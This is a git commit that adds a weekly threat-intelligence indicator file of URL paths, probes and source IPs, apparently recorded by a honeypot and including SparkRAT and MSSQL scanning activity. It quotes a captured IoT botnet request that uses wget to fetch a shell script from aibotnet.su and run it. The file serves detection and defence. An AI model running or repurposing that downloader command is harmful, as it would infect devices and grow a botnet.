From 805ce54d6b181cdaab453e7e50cfac14cc371b6a Mon Sep 17 00:00:00 2001 From: hrbrmstr Date: Mon, 20 Jul 2026 07:23:29 -0400 Subject: chore: weekly asn update --- kevlar/2026-07-20/iocs/c2-paths.txt | 41 +++++++++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 kevlar/2026-07-20/iocs/c2-paths.txt (limited to 'kevlar/2026-07-20/iocs/c2-paths.txt') diff --git a/kevlar/2026-07-20/iocs/c2-paths.txt b/kevlar/2026-07-20/iocs/c2-paths.txt new file mode 100644 index 0000000..f7ef2b6 --- /dev/null +++ b/kevlar/2026-07-20/iocs/c2-paths.txt @@ -0,0 +1,41 @@ +# Weekly BP Report -- 2026-07-20 +# Notable HTTP URL paths observed, ordered by detectability/signal value +# Query range: 2026-07-13 through 2026-07-20 + +# IoT MIPS downloader (NEW observation - AS57043 Hostkey) +/shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh;chmod+777+kla.sh;./kla.sh +# Source: 132.243.194.215 (AS57043 Hostkey B.V. DE) +# JA4H: ge11nn0400_777e992b8532 +# Method: GET on port 6001 +# Intent: Shellshock-style or webshell-triggered IoT botnet MIPS ELF downloader (mirai-variant custom) +# Indicator: 3 events on 2026-07-16 between 00:21:43 and 03:43:00 UTC +# References: aibotnet.su domain -- active C2 URL serving /bins/kla.sh MIPS binaries + +# SPARKRAT update callback (NEW observation - AS200651 FlokiNET Tor exit) +/api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows +# Source: 185.100.87.136 (AS200651 PremiumTorExit Tor 0.4.9.11) +# JA4H: po11nn0600_c9506d37ac14 +# Method: POST with content-type "application/octet-stream" + secret header +# Intent: SPARK-RAT implant callback confirming Windows 64/amd64 implant update -- commit-style versioning commits to C2 git +# Indicator: 3 events on 2026-07-13, 5-hour window +# References: GreyNoise confirms new tag "SparkRAT Client Update Scanner" on this host + +# Event Manager RESTful probing (NEW - AS200651 FlokiNET Tor exit) +/eventmanager +# Source: 185.100.87.136 (AS200651) +# JA4H: ge11nn0400_88d30a62b7ad +# Method: GET /eventmanager HTTP/1.1 on port 443 +# Intent: SPARKRAT manager endpoint observation (subject to validation) + +# MSSQL TDS probing 1433 binary handshake (AS211720 Datashield) +MSSQL TDS Pre-Login binary 0x120100 34 bytes with "MSSQLServer" string and hostname "short-tan-rat" +# Source: 185.231.33.46 (AS211720) onto honeypot port 1433 +# associated_jarm: 07d19d12d21d21d07c42d43d000000f50d155305214cf247147c43c0f1a823 +# Intent: SQL Server payload inspection / pre-login banner to identify MSSQL version for brute +# Indicator: 2 events on 2026-07-16 and 2026-07-18 + +# Pfcloud's 8080/8081 proxy-style port range probing (AS51396) +GET / HTTP/1.1 on diverse ports 8080, 8081, 8888, 8000, 3128 -- 491 events across one week +# Source IP rotation: 45.135.193.193 (DE) primary; 45.135.194.10 (DE); 176.65.148.144 (NL); 204.76.203.30 (NL) +# UA: Go-http-client/1.1 + zgrab/0.x + odin-scanner/0.4 + Hello World +# Intent: Open proxy discovery -- scanning for proxy ports to abuse for proxy-rotation exfiltration tunnels \ No newline at end of file -- cgit v1.2.3